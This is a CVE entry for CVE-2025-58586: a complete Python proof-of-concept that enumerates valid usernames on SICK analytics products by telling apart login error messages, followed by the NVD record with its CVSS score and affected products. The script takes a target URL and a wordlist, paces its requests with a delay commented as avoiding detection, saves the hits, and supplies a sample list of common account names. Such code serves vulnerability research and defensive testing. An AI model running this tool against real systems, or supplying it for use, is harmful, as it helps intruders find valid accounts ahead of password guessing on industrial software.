CVE-2025-58586

#!/usr/bin/env python3 """ CVE-2025-58586 - SICK Product Username Enumeration PoC This PoC demonstrates how to enumerate valid usernames by analyzing differential error messages in the login response. """ import requests import argparse import sys import time class UsernameEnumerator: """ Username enumeration tool that exploits differential error messages in the login functionality of SICK products. """ def __init__(self, target_url, username_field="username", password_field="password"): self.target_url = target_url self.username_field = username_field self.password_field = password_field self.session = requests.Session() # Known different response indicators based on vulnerability analysis self.user_not_found_indicators = [ "user not found", "username does not exist", "invalid username", "user does not exist", "no such user", "account not found", "unknown user" ] self.wrong_password_indicators = [ "incorrect password", "wrong password", "invalid password", "invalid credentials", "authentication failed", "login failed", "password mismatch" ] def check_response(self, response_text): """ Analyze the response to determine if the username exists. Returns True if username likely exists, False otherwise. """ response_lower = response_text.lower() # Check for user-not-found indicators for indicator in self.user_not_found_indicators: if indicator in response_lower: return False # Check for wrong-password indicators for indicator in self.wrong_password_indicators: if indicator in response_lower: return True # If no clear indicator, return None (undetermined) return None def enumerate_usernames(self, username_list, delay=0.5): """ Enumerate valid usernames from a wordlist. """ valid_usernames = [] for username in username_list: try: # Send login request with a dummy password payload = { self.username_field: username, self.password_field: "InvalidPassword123!@#" } response = self.session.post( self.target_url, data=payload, timeout=10, allow_redirects=False ) result = self.check_response(response.text) if result is True: print(f"[+] VALID USER FOUND: {username}") valid_usernames.append(username) elif result is False: print(f"[-] Invalid user: {username}") else: print(f"[?] Undetermined: {username} - Response: {response.text[:100]}") time.sleep(delay) # Rate limiting to avoid detection except requests.exceptions.RequestException as e: print(f"[!] Error testing {username}: {e}") continue return valid_usernames def load_wordlist(filepath): """Load username wordlist from file.""" try: with open(filepath, 'r', encoding='utf-8') as f: return [line.strip() for line in f if line.strip()] except FileNotFoundError: print(f"[!] Wordlist file not found: {filepath}") sys.exit(1) def main(): parser = argparse.ArgumentParser( description="CVE-2025-58586 - SICK Product Username Enumeration Tool" ) parser.add_argument( "-u", "--url", required=True, help="Target login URL (e.g., https://target.com/login)" ) parser.add_argument( "-w", "--wordlist", required=True, help="Path to username wordlist file" ) parser.add_argument( "-d", "--delay", type=float, default=0.5, help="Delay between requests in seconds (default: 0.5)" ) parser.add_argument( "--user-field", default="username", help="Username field name (default: username)" ) parser.add_argument( "--pass-field", default="password", help="Password field name (default: password)" ) parser.add_argument( "-o", "--output", default="valid_users.txt", help="Output file for valid usernames (default: valid_users.txt)" ) args = parser.parse_args() print(f"[*] CVE-2025-58586 Username Enumeration Tool") print(f"[*] Target: {args.url}") print(f"[*] Wordlist: {args.wordlist}") print(f"[*] Delay: {args.delay}s") print("-" * 50) username_list = load_wordlist(args.wordlist) print(f"[*] Loaded {len(username_list)} usernames to test") print("-" * 50) enumerator = UsernameEnumerator( args.url, args.user_field, args.pass_field ) valid_users = enumerator.enumerate_usernames(username_list, args.delay) print("-" * 50) print(f"[*] Enumeration complete. Found {len(valid_users)} valid usernames.") if valid_users: with open(args.output, 'w', encoding='utf-8') as f: for user in valid_users: f.write(user + "\n") print(f"[*] Results saved to: {args.output}") if __name__ == "__main__": main() # Usage example: # python cve-2025-58586.py -u https://target-sick-product.com/login -w usernames.txt -d 1.0 # # Sample usernames.txt: # admin # root # user # operator # service # guest # maintenance # supervisor # engineer # technician

{"cve": {"id": "CVE-2025-58586", "sourceIdentifier": "[email protected]", "published": "2025-10-06T07:15:35.390", "lastModified": "2026-01-27T19:46:54.260", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "For failed login attempts, the application returns different error messages depending on whether the login failed due to an incorrect password or a non-existing username. This allows an attacker to guess usernames until they find an existing one."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-204"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sick:baggage_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "E62416BA-1BF1-43BD-98B2-57BD34128419"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sick:enterprise_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "04E8EA78-2780-40C0-B5BA-6CF99DE6355B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sick:logistic_diagnostic_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "27031959-2981-4755-9E3D-02CD083F2B72"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sick:package_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "5955214B-0D71-449A-BFD4-8804FDF91CA1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sick:tire_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "86C0BA69-E701-45A3-ADA5-130B8AD9DF15"}]}]}], "references": [{"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}]}}